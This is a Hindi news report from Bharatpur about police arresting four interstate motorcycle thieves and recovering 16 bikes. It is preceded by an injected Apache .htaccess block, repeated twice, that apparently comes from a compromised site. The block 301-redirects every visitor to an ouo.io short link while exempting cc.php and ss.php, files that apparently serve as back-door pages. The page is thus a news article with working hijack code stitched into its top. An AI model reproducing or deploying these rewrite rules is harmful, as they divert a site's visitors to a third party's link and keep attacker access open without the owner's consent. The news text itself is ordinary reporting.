
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 515
Nextभरतपुर। पुलिस को एक बाइक चोर गिरोह को पकडने में सफलता प्राप्त हुई है। पुलिस ने 4 अंतरराज्यीय बाइक चोरों को गिरफ्तार कर उनके कब्जे से 16 मोटरसाईकिल बरामद की है जबकि एक बाइक के कलपुर्जे बरामद किये है। पुलिस के द्वारा उनसे गहनतापूर्वक पूछताछ जारी है जिससे अन्य चोरी की घटनाओं के खुलने की भी उम्मीद जताई जा रही है। पुलिस अधीक्षक अनिल कुमार टांक ने बताया कि जिले में दुपहिया वाहनों की चोरी की वारदातों को गंभीरता से लेते हुए वारदातों पर अंकुश लगाने हेतु अतिरिक्त पुलिस अधीक्षक सुरेश खींची तथा उप अधीक्षक शहर आवडदान रतनू के सुपरविजन में अटलबन्द थाना अधिकारी उपनिरीक्षक मुकेश कुमार, हैडकानिस्टेबल तारा चन्द व कानिस्टेबल रवि कुमार एवं बलदेव सिंह एएसआई सीआईयू टीम मय जाप्ता द्वारा संयुक्त रूप से विशेष टीम का गठन किया गया। इस टीम के द्वारा दुपहिया वाहनों की चोरी करने वाले गैंग की निगरानी के लिए दार्शनिक स्थलों व मैरिज होमों पर सादा वर्दी में नजर रखी जा रही थी। इसी कडी में अटलबन्द थाना पुलिस एवं सीआईयू टीम द्वारा संयुक्त कार्यवाही करते हुए देवेन्द्र उर्फ बौना निवासी अमेरिकन गेट पक्का बाग को गिरफ्तार किया गया जो पूर्व मे भी वाहन चोरी में संलिप्त रहा है। जिससे पूछताछ पर अपने साथी हरेन्द्र सिंह निवासी नगला बरताई, परशुराम निवासी नौह बछामदी तथा लवकुश निवासी नौह बछामदी को चोरी की मोटर साईकिल सहित लाकर पूछताछ की गई। जिस पर आरोपियों के कब्जे से 16 मोटर साईकिले बरामदें की गई।